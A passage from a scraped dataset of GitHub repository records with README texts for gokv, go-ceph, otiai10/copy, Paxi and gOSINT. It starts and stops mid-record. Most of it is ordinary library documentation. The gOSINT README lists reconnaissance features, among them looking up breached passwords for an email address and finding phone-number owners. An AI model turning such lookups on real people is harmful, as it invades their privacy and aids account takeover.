the Gin web framework. You need some database to store state. You can't use a Go map, because its data is not persisted across web service restarts. You can't use an embedded DB like bbolt, BadgerDB or SQLite, because that would restrict the web service to one instance, but nowadays every web service is designed with high horizontal scalability in mind. If you use Redis, MongoDB or PostgreSQL though, you would force the package user (the developer who creates the actual web service with Gin and your middleware) to run and administrate the server, even if she might never have used it before and doesn't know how to configure them for high performance and security.\n\nAny decision for a specific database would limit the package's usability.\n\nOne solution would be a custom interface where you would leave the implementation to the package user. But that would require the developer to dive into the details of the Go package of the chosen key-value store. And if the developer wants to switch the store, or maybe use one for local testing and another for production, she would need to write *multiple* implementations.\n\n`gokv` is the solution for these problems. Package *creators* use the `gokv.Store` interface as parameter and can call its methods within their code, leaving the decision which actual store to use to the package user. Package *users* pick one of the implementations, for example `github.com/philippgille/gokv/redis` for Redis and pass the `redis.Client` created by `redis.NewClient(...)` as parameter. Package users can also develop their own implementations if they need to.\n\n`gokv` doesn't just have to be used to satisfy some `gokv.Store` parameter. It can of course also be used by application / web service developers who just don't want to dive into the sometimes complicated usage of some key-value store packages.\n\nInitially it was developed as `storage` package within the project [ln-paywall](https://github.com/philippgille/ln-paywall) to provide the users of ln-paywall with multiple storage options, but at some point it made sense to turn it into a repository of its own.\n\nBefore doing so I examined existing Go packages with a similar purpose (see [Related projects](#related-projects)), but none of them fit my needs. 
They either had too few implementations, or they didn't automatically marshal / unmarshal passed structs, or the interface had too many methods, making the project seem too complex to maintain and extend, proven by some that were abandoned or forked (splitting the community with it).\n\nDesign decisions\n----------------\n\n- `gokv` is primarily an abstraction for **key-value stores**, not caches, so there's no need for cache eviction and timeouts.\n - It's still possible to have cache eviction. In some cases you can configure it on the server, or in case of Memcached it's even the default. Or you can have an implementation-specific `Option` that configures the key-value store client to set a timeout on some key-value pair when storing it in the server. But this should be implementation-specific and not be part of the interface methods, which would require *every* implementation to support cache eviction.\n- The package should be usable without having to write additional code, so structs should be (un-)marshalled automatically, without having to implement `MarshalJSON()` / `GobEncode()` and `UnmarshalJSON()` / `GobDecode()` first. It's still possible to implement these methods to customize the (un-)marshalling, for example to include unexported fields, or for higher performance (because the `encoding/json` / `encoding/gob` package doesn't have to use reflection).\n- It should be easy to create your own store implementations, as well as to review and maintain the code of this repository, so there should be as few interface methods as possible, but still enough so that functions taking the `gokv.Store` interface as parameter can do everything that's usually required when working with a key-value store. For example, a boolean return value for the `Delete` method that indicates whether a value was actually deleted (because it was previously present) can be useful, but isn't a must-have, and also it would require some `Store` implementations to implement the check by themselves (because the existing libraries don't support it), which would unnecessarily decrease performance for those who don't need it. Or as another example, a `Watch(key string) (<-chan Notification, error)` method that sends notifications via a Go channel when the value of a given key changes is nice to have for a few use cases, but in most cases it's not required.\n - > Note: In the future we might add another interface, so that there's one for the basic operations and one for advanced uses.\n- Similar projects name the structs that are implementations of the store interface according to the backing store, for example `boltdb.BoltDB`, but this leads to so called \"stuttering\" that's discouraged when writing idiomatic Go. That's why `gokv` uses for example `bbolt.Store` and `syncmap.Store`. For easier differentiation between embedded DBs and DBs that have a client and a server component though, the first ones are called `Store` and the latter ones are called `Client`, for example `redis.Client`.\n- All errors are implementation-specific. We could introduce a `gokv.StoreError` type and define some constants like a `SetError` or something more specific like a `TimeoutError`, but non-specific errors don't help the package user, and specific errors would make it very hard to create and especially maintain a `gokv.Store` implementation. 
You would need to know exactly in which cases the package (that the implementation uses) returns errors, what the errors mean (to \"translate\" them) and keep up with changes and additions of errors in the package. So instead, errors are just forwarded. For example, if you use the `dynamodb` package, the returned errors will be errors from the `github.com/aws/aws-sdk-go` package.\n- Keep the terminology of used packages. This might be controversial, because an abstraction / wrapper *unifies* the interface of the used packages. But:\n 1. Naming is hard. If one used package for an embedded database uses `Path` and another `Directory`, then how should we name the option for the database directory? Maybe `Folder`, to add to the confusion? Also, some users might already have used the packages we use directly and they would wonder about the \"new\" variable name which has the same meaning. \n Using the packages' variable names spares us the need to come up with unified, understandable variable names without alienating users who already used the packages we use directly.\n 2. Only a few users are going to switch back and forth between `gokv.Store` implementations, so most users won't even notice the differences in variable names.\n- Each `gokv` implementation is a Go module. This differs from repositories that contain a single Go module with many subpackages, but has the huge advantage that if you only want to work with the Redis client for example, the `go get` will only fetch the Redis dependencies and not the huge amount of dependencies that are used across the whole repository.\n\nRelated projects\n----------------\n\n- [libkv](https://github.com/docker/libkv)\n - Uses `[]byte` as value, no automatic (un-)marshalling of structs\n - No support for Redis, BadgerDB, Go map, MongoDB, AWS DynamoDB, Memcached, MySQL, ...\n - Not actively maintained anymore (3 direct commits + 1 merged PR in the last 10+ months, as of 2018-10-13)\n- [valkeyrie](https://github.com/abronan/valkeyrie)\n - Fork of libkv\n - Same disadvantage: Uses `[]byte` as value, no automatic (un-)marshalling of structs\n - No support for BadgerDB, Go map, MongoDB, AWS DynamoDB, Memcached, MySQL, ...\n- [gokvstores](https://github.com/ulule/gokvstores)\n - Only supports Redis and local in-memory cache\n - Not actively maintained anymore (4 direct commits + 1 merged PR in the last 10+ months, as of 2018-10-13)\n - 13 stars (as of 2018-10-13)\n- [gokv](https://github.com/gokv)\n - Requires a `json.Marshaler` / `json.Unmarshaler` as parameter, so you always need to explicitly implement their methods for your structs, and also you can't use gob or other formats for (un-)marshaling.\n - No support for Consul, etcd, bbolt / Bolt, BadgerDB, MongoDB, AWS DynamoDB, Memcached, MySQL, ...\n - Separate repo for each implementation, which has advantages and disadvantages\n - No releases (makes it harder to use with package managers like dep)\n - 2-7 stars (depending on the repository, as of 2018-10-13)\n\nOthers:\n\n- [gladkikhartem/gokv](https://github.com/gladkikhartem/gokv): No `Delete()` method, no Redis, embedded DBs etc., no Git tags / releases, no stars (as of 2018-11-28)\n- [bradberger/gokv](https://github.com/bradberger/gokv): Not maintained (no commits in the last 22 months), no Redis, Consul etc., no Git tags / releases, 1 star (as of 2018-11-28)\n - This package inspired me to implement something similar to its `Codec`.\n- [ppacher/gokv](https://github.com/ppacher/gokv): Not maintained (no commits in the last 22 months), no Redis, 
embedded DBs etc., no automatic (un-)marshalling, 1 star (as of 2018-11-28)\n - Nice CLI!\n- [kapitan-k/gokvstore](https://github.com/kapitan-k/gokvstore): Not actively maintained (no commits in the last 10+ months), RocksDB only, requires cgo, no automatic (un-)marshalling, no Git tags/ releases, 1 star (as of 2018-11-28)\n\nLicense\n-------\n\n`gokv` is licensed under the [Mozilla Public License Version 2.0](https://www.mozilla.org/en-US/MPL/2.0/).\n\n- [FAQ](https://www.mozilla.org/en-US/MPL/2.0/FAQ/)\n- [Summary 1](https://choosealicense.com/licenses/mpl-2.0/)\n- [Summary 2](https://tldrlegal.com/license/mozilla-public-license-2.0-(mpl-2))\n\nDependencies might be licensed under other licenses.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ceph/go-ceph", "link": "https://github.com/ceph/go-ceph", "tags": ["rados", "rbd", "cephfs", "ceph-radosgw", "ceph", "bindings", "golang"], "stars": 518, "description": "Go bindings for Ceph :octopus: :octopus: :octopus:", "lang": "Go", "repo_lang": "", "readme": "# go-ceph - Go bindings for Ceph APIs\n\n[![Godoc](http://img.shields.io/badge/godoc-reference-blue.svg?style=flat)](https://godoc.org/github.com/ceph/go-ceph) [![license](http://img.shields.io/badge/license-MIT-red.svg?style=flat)](https://raw.githubusercontent.com/ceph/go-ceph/master/LICENSE)\n\n## Introduction\n\nThe go-ceph project is a collection of API bindings that support the use of\nnative Ceph APIs, which are C language functions, in Go. These bindings make\nuse of Go's cgo feature.\nThere are three main Go sub-packages that make up go-ceph:\n* rados - exports functionality from Ceph's librados\n* rbd - exports functionality from Ceph's librbd\n* cephfs - exports functionality from Ceph's libcephfs\n* rgw/admin - interact with [radosgw admin ops API](https://docs.ceph.com/en/latest/radosgw/adminops)\n\nWe aim to provide comprehensive support for the Ceph APIs over time. This\nincludes both I/O related functions and management functions. If your project\nmakes use of Ceph command line tools and is written in Go, you may be able to\nswitch away from shelling out to the CLI and to these native function calls.\n\n## Installation\n\nThe code in go-ceph is purely a library module. Typically, one will import\ngo-ceph in another Go based project. When building the code the native RADOS,\nRBD, & CephFS library and development headers are expected to be installed.\n\nOn debian based systems (apt) these may be:\n```sh\nlibcephfs-dev librbd-dev librados-dev\n```\n\nOn rpm based systems (dnf, yum, etc) these may be:\n```sh\nlibcephfs-devel librbd-devel librados-devel\n```\n\nOn MacOS you can use brew to install the libraries:\n```sh\nbrew tap mulbc/ceph-client\nbrew install ceph-client\n```\n\nNOTE: CentOS users may want to use a\n[CentOS Storage SIG](https://wiki.centos.org/SpecialInterestGroup/Storage/Ceph)\nrepository to enable packages for a supported ceph version.\nExample: `dnf -y install centos-release-ceph-pacific`.\n(CentOS 7 users should use \"yum\" rather than \"dnf\")\n\n\nTo quickly test if one can build with go-ceph on your system, run:\n```sh\ngo get github.com/ceph/go-ceph\n```\n\nOnce compiled, code using go-ceph is expected to dynamically link to the Ceph\nlibraries. These libraries must be available on the system where the go based\nbinaries will be run. Our use of cgo and ceph libraries does not allow for\nfully static binaries.\n\ngo-ceph tries to support different Ceph versions. 
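\n\nA minimal program along the following lines should compile against any of them and can double as a smoke test that the libraries link correctly; this is a rough sketch, not an excerpt from the go-ceph docs, so check the call names against the API documentation:\n\n```go\npackage main\n\nimport (\n\t\"log\"\n\n\t\"github.com/ceph/go-ceph/rados\"\n)\n\nfunc main() {\n\t// Create a librados connection handle and read the default ceph.conf.\n\tconn, err := rados.NewConn()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tif err := conn.ReadDefaultConfigFile(); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\t// Connecting requires a reachable, configured Ceph cluster.\n\tif err := conn.Connect(); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer conn.Shutdown()\n\n\tlog.Println(\"connected to the Ceph cluster\")\n}\n```\n\n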
However some functions might\nonly be available in recent versions, and others may be deprecated. In order to\nwork with non-current versions of Ceph, it is required to pass build-tags to\nthe `go` command line. A tag with the named Ceph release will enable/disable\ncertain features of the go-ceph packages, and prevent warnings or compile\nproblems. For example, to ensure you select the library features that match\nthe \"pacific\" release, use:\n```sh\ngo build -tags pacific ....\ngo test -tags pacific ....\n```\n\n### Supported Ceph Versions\n\n| go-ceph version | Supported Ceph Versions | Deprecated Ceph Versions |\n| --------------- | ------------------------| -------------------------|\n| v0.20.0 | pacific, quincy | nautilus, octopus |\n| v0.19.0 | pacific, quincy | nautilus, octopus |\n| v0.18.0 | octopus, pacific, quincy | nautilus |\n| v0.17.0 | octopus, pacific, quincy | nautilus |\n| v0.16.0 | octopus, pacific\u2020 | nautilus |\n| v0.15.0 | octopus, pacific | nautilus |\n| v0.14.0 | octopus, pacific | nautilus |\n| v0.13.0 | octopus, pacific | nautilus |\n| v0.12.0 | octopus, pacific | nautilus |\n| v0.11.0 | nautilus, octopus, pacific | |\n| v0.10.0 | nautilus, octopus, pacific | |\n| v0.9.0 | nautilus, octopus | |\n| v0.8.0 | nautilus, octopus | |\n| v0.7.0 | nautilus, octopus | |\n| v0.6.0 | nautilus, octopus | mimic |\n| v0.5.0 | nautilus, octopus | luminous, mimic |\n| v0.4.0 | luminous, mimic, nautilus, octopus | |\n| v0.3.0 | luminous, mimic, nautilus, octopus | |\n| v0.2.0 | luminous, mimic, nautilus | |\n| (pre release) | luminous, mimic (see note) | |\n\nThese tags affect what is supported at compile time. What version of the Ceph\ncluster the client libraries support, and vice versa, is determined entirely\nby what version of the Ceph C libraries go-ceph is compiled with.\n\n\u2020 Preliminary support for Ceph Quincy was available, but not fully tested, in\nthis release.\n\nNOTE: Prior to 2020 the project did not make versioned releases. The ability to\ncompile with a particular Ceph version before go-ceph v0.2.0 is not guaranteed.\n\n\n## Documentation\n\nDetailed API documentation is available at\n.\n\nSome [API Hints and How-Tos](./docs/hints.md) are also available to quickly\nintroduce how some of API calls work together.\n\n\n## Development\n\n```\ndocker run --rm -it --net=host \\\n --security-opt apparmor:unconfined \\\n -v ${PWD}:/go/src/github.com/ceph/go-ceph:z \\\n -v /home/nwatkins/src/ceph/build:/home/nwatkins/src/ceph/build:z \\\n -e CEPH_CONF=/home/nwatkins/src/ceph/build/ceph.conf \\\n ceph-golang\n```\n\nRun against a `vstart.sh` cluster without installing Ceph:\n\n```\nexport CGO_CPPFLAGS=\"-I/ceph/src/include\"\nexport CGO_LDFLAGS=\"-L/ceph/build/lib\"\ngo build\n```\n\n## Contributing\n\nContributions are welcome & greatly appreciated, every little bit helps. Make code changes via Github pull requests:\n\n- Fork the repo and create a topic branch for every feature/fix. Avoid\n making changes directly on master branch.\n- All incoming features should be accompanied with tests.\n- Make sure that you run `go fmt` before submitting a change\n set. Alternatively the Makefile has a flag for this, so you can call\n `make fmt` as well.\n- The integration tests can be run in a docker container, for this run:\n\n```\nmake test-docker\n```\n\n### Getting in Touch\n\nWant to get in touch with the go-ceph team? 
We're available through a few\ndifferent channels:\n* Have a question, comment, or feedback:\n [Use the Discussions Board](https://github.com/ceph/go-ceph/discussions)\n* Report an issue or request a feature:\n [Issues Tracker](https://github.com/ceph/go-ceph/issues)\n* We participate in the Ceph\n [user's mailing list](https://lists.ceph.io/hyperkitty/list/ceph-users@ceph.io/)\n and [dev list](https://lists.ceph.io/hyperkitty/list/dev@ceph.io/)\n and we also announce our releases on those lists\n* You can sometimes find us in the\n [#ceph-devel IRC channel](https://ceph.io/irc/) - hours may vary\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "otiai10/copy", "link": "https://github.com/otiai10/copy", "tags": ["golang", "copy", "files", "directory", "recursive", "go", "folder", "folders", "directories"], "stars": 517, "description": "Go copy directory recursively", "lang": "Go", "repo_lang": "", "readme": "# copy\n\n[![Go Reference](https://pkg.go.dev/badge/github.com/otiai10/copy.svg)](https://pkg.go.dev/github.com/otiai10/copy)\n[![Actions Status](https://github.com/otiai10/copy/workflows/Go/badge.svg)](https://github.com/otiai10/copy/actions)\n[![codecov](https://codecov.io/gh/otiai10/copy/branch/main/graph/badge.svg)](https://codecov.io/gh/otiai10/copy)\n[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://github.com/otiai10/copy/blob/main/LICENSE)\n[![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2Fotiai10%2Fcopy.svg?type=shield)](https://app.fossa.com/projects/git%2Bgithub.com%2Fotiai10%2Fcopy?ref=badge_shield)\n[![CodeQL](https://github.com/otiai10/copy/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/otiai10/copy/actions/workflows/codeql-analysis.yml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/otiai10/copy)](https://goreportcard.com/report/github.com/otiai10/copy)\n[![GitHub tag (latest SemVer)](https://img.shields.io/github/v/tag/otiai10/copy?sort=semver)](https://pkg.go.dev/github.com/otiai10/copy)\n[![Docker Test](https://github.com/otiai10/copy/actions/workflows/docker-test.yml/badge.svg)](https://github.com/otiai10/copy/actions/workflows/docker-test.yml)\n[![Vagrant Test](https://github.com/otiai10/copy/actions/workflows/vagrant-test.yml/badge.svg)](https://github.com/otiai10/copy/actions/workflows/vagrant-test.yml)\n\n`copy` copies directories recursively.\n\n# Example Usage\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\tcp \"github.com/otiai10/copy\"\n)\n\nfunc main() {\n\terr := cp.Copy(\"your/src\", \"your/dest\")\n\tfmt.Println(err) // nil\n}\n```\n\n# Advanced Usage\n\n```go\n// Options specifies optional actions on copying.\ntype Options struct {\n\n\t// OnSymlink can specify what to do on symlink\n\tOnSymlink func(src string) SymlinkAction\n\n\t// OnDirExists can specify what to do when there is a directory already existing in destination.\n\tOnDirExists func(src, dest string) DirExistsAction\n\n\t// Skip can specify which files should be skipped\n\tSkip func(srcinfo os.FileInfo, src, dest string) (bool, error)\n\n\t// PermissionControl can control permission of\n\t// every entry.\n\t// When you want to add permission 0222, do like\n\t//\n\t//\t\tPermissionControl = AddPermission(0222)\n\t//\n\t// or if you even don't want to touch permission,\n\t//\n\t//\t\tPermissionControl = DoNothing\n\t//\n\t// By default, PermissionControl = PreservePermission\n\tPermissionControl PermissionControlFunc\n\n\t// 
Sync file after copy.\n\t// Useful in case when file must be on the disk\n\t// (in case crash happens, for example),\n\t// at the expense of some performance penalty\n\tSync bool\n\n\t// Preserve the atime and the mtime of the entries\n\t// On linux we can preserve only up to 1 millisecond accuracy\n\tPreserveTimes bool\n\n\t// Preserve the uid and the gid of all entries.\n\tPreserveOwner bool\n\n\t// The byte size of the buffer to use for copying files.\n\t// If zero, the internal default buffer of 32KB is used.\n\t// See https://golang.org/pkg/io/#CopyBuffer for more information.\n\tCopyBufferSize uint\n}\n```\n\n```go\n// For example...\nopt := Options{\n\tSkip: func(info os.FileInfo, src, dest string) (bool, error) {\n\t\treturn strings.HasSuffix(src, \".git\"), nil\n\t},\n}\nerr := Copy(\"your/directory\", \"your/directory.copy\", opt)\n```\n\n# Issues\n\n- https://github.com/otiai10/copy/issues\n\n\n## License\n[![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2Fotiai10%2Fcopy.svg?type=large)](https://app.fossa.com/projects/git%2Bgithub.com%2Fotiai10%2Fcopy?ref=badge_large)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ailidani/paxi", "link": "https://github.com/ailidani/paxi", "tags": ["paxos", "wan", "wpaxos"], "stars": 517, "description": "Paxos protocol framework", "lang": "Go", "repo_lang": "", "readme": "[![GoDoc](https://godoc.org/github.com/ailidani/paxi?status.svg)](https://godoc.org/github.com/ailidani/paxi)\n[![Go Report Card](https://goreportcard.com/badge/github.com/ailidani/paxi)](https://goreportcard.com/report/github.com/ailidani/paxi)\n[![Build Status](https://travis-ci.org/ailidani/paxi.svg?branch=master)](https://travis-ci.org/ailidani/paxi)\n\n\n## What is Paxi?\n\n**Paxi** is the framework that implements WPaxos and other Paxos protocol variants. Paxi provides most of the elements that any Paxos implementation or replication protocol needs, including network communication, state machine of a key-value store, client API and multiple types of quorum systems.\n\n*Warning*: Paxi project is still under heavy development, with more features and protocols to include. Paxi API may change too.\n\nPaxi paper (SIGMOD) can be found in https://dl.acm.org/doi/abs/10.1145/3299869.3319893.\nBibTex:\n```bibtex\n@inproceedings{ailijiang2019dissecting,\n title={Dissecting the Performance of Strongly-Consistent Replication Protocols},\n author={Ailijiang, Ailidani and Charapko, Aleksey and Demirbas, Murat},\n booktitle={Proceedings of the 2019 International Conference on Management of Data},\n pages={1696--1710},\n year={2019}\n}\n```\n\n## What is WPaxos?\n\n**WPaxos** is a multileader Paxos protocol that provides low-latency and high-throughput consensus across wide-area network (WAN) deployments. Unlike statically partitioned multiple Paxos deployments, WPaxos perpetually adapts to the changing access locality through object stealing. Multiple concurrent leaders coinciding in different zones steal ownership of objects from each other using phase-1 of Paxos, and then use phase-2 to commit update-requests on these objects locally until they are stolen by other leaders. 
To achieve fast phase-2 commits, WPaxos adopts the flexible quorums idea in a novel manner, and appoints phase-2 acceptors to be close to their respective leaders.\n\nWPaxos (WAN Paxos) paper (TPDS journal version) can be found in https://ieeexplore.ieee.org/abstract/document/8765834.\nBibTex:\n```bibtex\n@article{ailijiang2019wpaxos,\n title={WPaxos: Wide area network flexible consensus},\n author={Ailijiang, Ailidani and Charapko, Aleksey and Demirbas, Murat and Kosar, Tevfik},\n journal={IEEE Transactions on Parallel and Distributed Systems},\n volume={31},\n number={1},\n pages={211--223},\n year={2019},\n publisher={IEEE}\n}\n```\n\n## What is included?\n\nAlgorithms:\n- [x] Classical multi-Paxos\n- [x] [Flexible Paxos](https://dl.acm.org/citation.cfm?id=3139656)\n- [x] [WPaxos](https://arxiv.org/abs/1703.08905)\n- [x] [EPaxos](https://dl.acm.org/citation.cfm?id=2517350)\n- [x] [SDPaxos](https://www.microsoft.com/en-us/research/uploads/prod/2018/09/172-zhao.pdf)\n- [x] Atomic Storage ([Majority Replication](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.174.7245&rep=rep1&type=pdf))\n- [x] [Chain Replication](https://www.cs.cornell.edu/home/rvr/papers/OSDI04.pdf)\n- [x] KPaxos (Static partitioned Paxos)\n- [x] [Dynamo Key-value Store](https://dl.acm.org/citation.cfm?id=1294281)\n- [x] [WanKeeper](http://ieeexplore.ieee.org/abstract/document/7980095/)\n- [x] [Vertical Paxos](https://www.microsoft.com/en-us/research/wp-content/uploads/2009/08/Vertical-Paxos-and-Primary-Backup-Replication-.pdf)\n\n\nFeatures:\n- [x] Benchmarking\n- [x] Linearizability checker\n- [x] Fault injection\n\n\n# How to build\n\n1. Install [Go](https://golang.org/dl/).\n2. Use the `go get` command or [Download](https://github.com/wpaxos/paxi/archive/master.zip) the Paxi source code from the GitHub page.\n```\ngo get github.com/ailidani/paxi\n```\n\n3. Compile everything from the `paxi/bin` folder.\n```\ncd github.com/ailidani/paxi/bin\n./build.sh\n```\n\nAfter compiling, Go will generate 3 executable files under the `bin` folder.\n* `server` is one replica instance.\n* `client` is a simple benchmark that generates read/write requests to servers.\n* `cmd` is a command line tool to test Get/Set requests.\n\n\n# How to run\n\nEach executable file expects some parameters, which can be seen with the `-help` flag, e.g. `./server -help`.\n\n1. Create the [configuration file](https://github.com/ailidani/paxi/blob/master/bin/config.json) according to the example, then start the server with the `-config FILE_PATH` option, which defaults to \"config.json\" when omitted.\n\n2. Start 9 servers with different ids in the format \"ZONE_ID.NODE_ID\".\n```\n./server -id 1.1 -algorithm=paxos &\n./server -id 1.2 -algorithm=paxos &\n./server -id 1.3 -algorithm=paxos &\n./server -id 2.1 -algorithm=paxos &\n./server -id 2.2 -algorithm=paxos &\n./server -id 2.3 -algorithm=paxos &\n./server -id 3.1 -algorithm=paxos &\n./server -id 3.2 -algorithm=paxos &\n./server -id 3.3 -algorithm=paxos &\n```\n\n3. Start a benchmarking client that connects to server ID 1.1, with benchmark parameters specified in [config.json](https://github.com/ailidani/paxi/blob/master/bin/config.json).\n```\n./client -id 1.1 -config config.json\n```\nWhen the `id` flag is absent, the client will randomly select a server for each operation.\n\nThe algorithms can also be run in **simulation** mode, where all nodes run in one process and the transport layer is replaced by Go channels. 
Check [`simulation.sh`](https://github.com/ailidani/paxi/blob/master/bin/simulation.sh) script on how to run.\n\n\n# How to implement algorithms in Paxi\n\nReplication algorithm in Paxi follows the message passing model, where several message types and their handle function are registered. We use [Paxos](https://github.com/ailidani/paxi/tree/master/paxos) as an example for our step-by-step tutorial.\n\n1. Define messages, register with gob in `init()` function if using gob codec. As show in [`msg.go`](https://github.com/ailidani/paxi/blob/master/paxos/msg.go).\n\n2. Define a `Replica` structure embeded with `paxi.Node` interface.\n```go\ntype Replica struct {\n\tpaxi.Node\n\t*Paxos\n}\n```\n\nDefine handle function for each message type. For example, to handle client `Request`\n```go\nfunc (r *Replica) handleRequest(m paxi.Request) {\n\tif *adaptive {\n\t\tif r.Paxos.IsLeader() || r.Paxos.Ballot() == 0 {\n\t\t\tr.Paxos.HandleRequest(m)\n\t\t} else {\n\t\t\tgo r.Forward(r.Paxos.Leader(), m)\n\t\t}\n\t} else {\n\t\tr.Paxos.HandleRequest(m)\n\t}\n\n}\n```\n\n3. Register the messages with their handle function using `Node.Register(interface{}, func())` interface in `Replica` constructor.\n\nReplica use `Send(to ID, msg interface{})`, `Broadcast(msg interface{})` functions in Node.Socket to send messages.\n\nFor data-store related functions check `db.go` file.\n\nFor quorum types check `quorum.go` file.\n\nClient uses a simple RESTful API to submit requests. GET method with URL \"http://ip:port/key\" will read the value of given key. POST method with URL \"http://ip:port/key\" and body as the value, will write the value to key.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Nhoya/gOSINT", "link": "https://github.com/Nhoya/gOSINT", "tags": ["go", "golang", "osint", "haveibeenpwnd", "pgp", "github", "bitbucket", "git", "telegram", "scraper", "spider", "crawler", "forensics", "infosec", "security", "pentest", "shodan-api", "shodan", "axfr"], "stars": 516, "description": "OSINT Swiss Army Knife", "lang": "Go", "repo_lang": "", "readme": "# gOSINT [![Build Status](https://travis-ci.org/Nhoya/gOSINT.svg?branch=master)](https://travis-ci.org/Nhoya/gOSINT) [![Build status](https://ci.appveyor.com/api/projects/status/9qn2y2f8t5up8ww2?svg=true)](https://ci.appveyor.com/project/Nhoya/gosint) [![GitHub stars](https://img.shields.io/github/stars/Nhoya/gOSINT.svg)](https://github.com/Nhoya/gOSINT/stargazers) [![GitHub forks](https://img.shields.io/github/forks/Nhoya/gOSINT.svg)](https://github.com/Nhoya/gOSINT/network) [![Twitter](https://img.shields.io/twitter/url/https/github.com/Nhoya/gOSINT.svg?style=social&style=plastic)](https://twitter.com/intent/tweet?text=Wow:&url=https%3A%2F%2Fgithub.com%2FNhoya%2FgOSINT) [![Go Report Card](https://goreportcard.com/badge/github.com/Nhoya/gOSINT)](https://goreportcard.com/report/github.com/Nhoya/gOSINT) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/76673062a30e48bd99d499d32c0c6af0)](https://www.codacy.com/app/Nhoya/gOSINT?utm_source=github.com&utm_medium=referral&utm_content=Nhoya/gOSINT&utm_campaign=Badge_Grade) [![Mentioned in Awesome Pentest](https://awesome.re/mentioned-badge.svg)](https://github.com/enaqx/awesome-pentest)\n\nOSINT Swiss Army Knife in Go\n\nTake a look at the [develop branch](https://github.com/Nhoya/gOSINT/tree/develop) for more updates.\n\n## Introduction\n\ngOSINT is a multiplatform OSINT Swiss army knife in Golang. 
If you want, feel free to contribute and/or leave a feedback!\n\n## Like my project? Please consider donation :)\n\n[![Paypal Badge](https://img.shields.io/badge/Donate-PayPal-yellow.svg)](https://www.paypal.me/Nhoya) [![BTC Badge](https://img.shields.io/badge/Donate-BTC-yellow.svg)](https://pastebin.com/raw/nyDDPwaM) [![Monero Badge](https://img.shields.io/badge/Donate-XMR-yellow.svg)](https://pastebin.com/raw/dNUFqwuC) [![Ethereum Badge](https://img.shields.io/badge/Donate-Ethereum-yellow.svg)](https://pastebin.com/raw/S6XMmSiv)\n\n## What gOSINT can do\n\nCurrently `gOSINT` has different modules:\n\n- [x] git support for mail retriving (using github API, or plain clone and search)\n- [x] Search for mails, aliases and KeyID in PGP Server\n- [x] [haveibeenpwned.com/](http://haveibeenpwned.com/) search for mail in databreach\n- [x] Retrieve Telegram Public Group Message History\n- [x] Search for mail address in source\n- [x] [shodan.io](https://shodan.io) search\n- [x] Subdomain enumeration using [crt.sh](https://crt.sh)\n- [x] Given a phone number, can retrieve the owner name\n- [x] Search for password relatives to email address :P\n- [x] Reverse Whois given Email Address or Name\n\nA complete features list and roadmap is available under [Projects Tab](https://github.com/Nhoya/gOSINT/projects)\n\n## Installation\n\n### Dependencies\n\ngOSINT currently depends from [tesseract-ocr](https://github.com/tesseract-ocr/) so you need to install on your system `tesseract-ocr`, `libtesseract-dev` and `libleptonica-dev`\n\n### Install on a go-dependent way (is the easier and faster way)\n\nYou can install `gOSINT` using `go get` with a simple \n\n`go get github.com/Nhoya/gOSINT/cmd/gosint`\n\n### Install On Windows\n\nCheck the AppVeyor Build page for builds\n\n## Manual Building\n\n### Building On Linux\n\nBuild gOSINT on linux is really easy, you just need to install [dep](https://github.com/golang/dep), clone the repository and `make` and `make install`\n\n### Building On Windows\n\nIf you have `make` installed you can follow the Linux instructions (and skip `make install`) otherwise be sure to have [dep](https://github.com/golang/dep) installed, clone the directory and run\n\n```bash\ndep ensure\ngo build cmd/gosint.go\n```\n\n### Running on Docker\n\ngOSINT currently supports container only for the rolling release, after the 1.0.0 release we will start working on a versioned Dockerfile.\nIf you want to try it out:\n\n```\nmkdir gOSINT\nwget https://raw.githubusercontent.com/Nhoya/gOSINT/develop/build/package/Dockerfile\ndocker build gosint .\ndocker run gosint bash\n```\n\n## Usage\n\n```bash\nusage: gOSINT [] [ ...]\n\nAn Open Source INTelligence Swiss Army Knife\n\nFlags:\n --help Show context-sensitive help (also try --help-long and --help-man).\n --json Enable JSON Output\n --debug Enable Debug Output\n --version Show application version.\n --verify Verify URL Status Code\n\nArgs:\n Domain URL\n\nCommands:\n help [...]\n Show help.\n\n\n git [] \n Get Emails and Usernames from repositories\n\n --method=[clone|gh] Specify the API to use or plain clone\n --recursive Search for each repository of the user\n\n pwd [] ...\n Check dumps for Email address using haveibeenpwned.com\n\n --get-passwords Search passwords for mail\n\n pgp ...\n Get Emails, KeyID and Aliases from PGP Keyring\n\n\n shodan [] ...\n Get info on host using shodan.io\n\n --new-scan Schedule a new shodan scan (1 Shodan Credit will be deducted)\n --honeypot Get honeypot probability\n\n shodan-query \n Send a query to 
